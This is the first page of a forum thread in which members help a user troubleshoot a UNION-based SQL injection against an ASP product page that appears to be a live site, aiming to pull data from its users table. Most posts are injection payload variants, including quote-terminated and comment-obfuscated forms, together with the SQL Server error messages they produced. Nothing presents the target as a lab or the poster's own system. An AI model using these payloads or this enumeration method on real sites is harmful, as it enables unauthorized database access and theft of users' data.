sql help needed
Page 1 of 2 12 LastLast
Results 1 to 10 of 14

Thread: sql help needed

  1. #1
    Member
    Join Date
    Jan 2008
    Posts
    30

    sql help needed

    When testing sql injection with this command:
    ?idProduct=-1+UNION+SELECT+1,2+FROM+users--
    I am getting this error:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

    [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'UNION'.

    /productdisplay.asp, line 36

    I have tried adding a quotation mark before UNION, but get another error message on unclosed quotation marks. What I think I should be aiming for is to get the "must have equal expression of target sites" error message. Can anyone help me out?

  2. #2
    Senior Member
    Join Date
    Oct 2003
    Location
    MA
    Posts
    1,053
    Well I can tell you that I highly doubt they are using columns named 1 and 2. Thats what you are telling it to do :-P

  3. #3
    Member
    Join Date
    Jan 2008
    Posts
    30
    Yeah i know that, but I'm expecting to get the "must have equal number of expressions" error message. Then just add numbers 3,4,5.... until there's no error message.Then I'll substitute in column names after that.

  4. #4
    Senior Member
    Join Date
    Oct 2003
    Location
    MA
    Posts
    1,053
    Im saying what you are essentially doing is writing a query that says:

    SELECT 1,2 FROM users

    but it need to look like:

    Select CollumnNameA,CollumnNameB From Users where UserID = 1,2

  5. #5
    Jaded Network Admin nebulus200's Avatar
    Join Date
    Jun 2002
    Posts
    1,356
    Not necessarily, the only thing that matters is that the # of columns matches and that the type is correct...

    If I had to guess I'd say there is possibly an issue with a quote somewhere...the other thing that looks odd is the negative product number...are you sure that isn't wigging it out?
    There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.

    (Merovingian - Matrix Reloaded)

  6. #6
    Member
    Join Date
    Jan 2008
    Posts
    30
    yeah i just added the -1 because I've noticed in the past that it normally works, but I tried without the negative and its the same error.

  7. #7
    Jaded Network Admin nebulus200's Avatar
    Join Date
    Jun 2002
    Posts
    1,356
    My best guess would be something to the effect of :

    ?idProduct=1'+UNION+SELECT+(1,2)+FROM+users--
    ?idProduct=1"+UNION+SELECT+(1,2)+FROM+users--

    Since it is choking on the union, my thought is it has to be something with the argument to idProduct and how the script is enclosing it in the subsequent SQL query...
    There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.

    (Merovingian - Matrix Reloaded)

  8. #8
    Member
    Join Date
    Jan 2008
    Posts
    30
    Ok, with this injection:
    1'+UNION+SELECT+(1,2)+FROM+users--
    i get:
    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

    [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' UNION SELECT (1,2) FROM users--'.

    /productdisplay.asp, line 36

    and with this: 1''+UNION+SELECT+(1,2)+FROM+users--

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

    [Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near ''.

    /productdisplay.asp, line 36

  9. #9
    Jaded Network Admin nebulus200's Avatar
    Join Date
    Jun 2002
    Posts
    1,356
    What does:
    '+UNION+SELECT+(1,2)+FROM+users--
    ''+UNION+SELECT+(1,2)+FROM+users--

    return? Note: no numeric argument there and the second is two '

    or

    1+UNION+SELECT+1,2+FROM+users/*
    or
    1/**/UNION/**/1,2/**/FROM/**/users/*
    There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.

    (Merovingian - Matrix Reloaded)

  10. #10
    Member
    Join Date
    Jan 2008
    Posts
    30
    These are just returning similar errors to before

Similar Threads

  1. Customizing Back|Track....Need Some Help
    By earthrocker in forum Newbie Security Questions
    Replies: 7
    Last Post: August 5th, 2006, 03:43 PM
  2. SQL Tutorial Basics
    By mikester2 in forum Other Tutorials Forum
    Replies: 5
    Last Post: January 31st, 2005, 12:16 PM
  3. SQL Tutorial
    By ch4r in forum Other Tutorials Forum
    Replies: 5
    Last Post: January 18th, 2005, 07:20 AM
  4. Heads Up - Cumulative Patch for Microsoft SQL Server (815495)
    By CXGJarrod in forum Microsoft Security Discussions
    Replies: 0
    Last Post: July 23rd, 2003, 10:00 PM
  5. SQL Sapphire Worm Analysis
    By s0nIc in forum AntiVirus Discussions
    Replies: 2
    Last Post: January 27th, 2003, 11:23 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •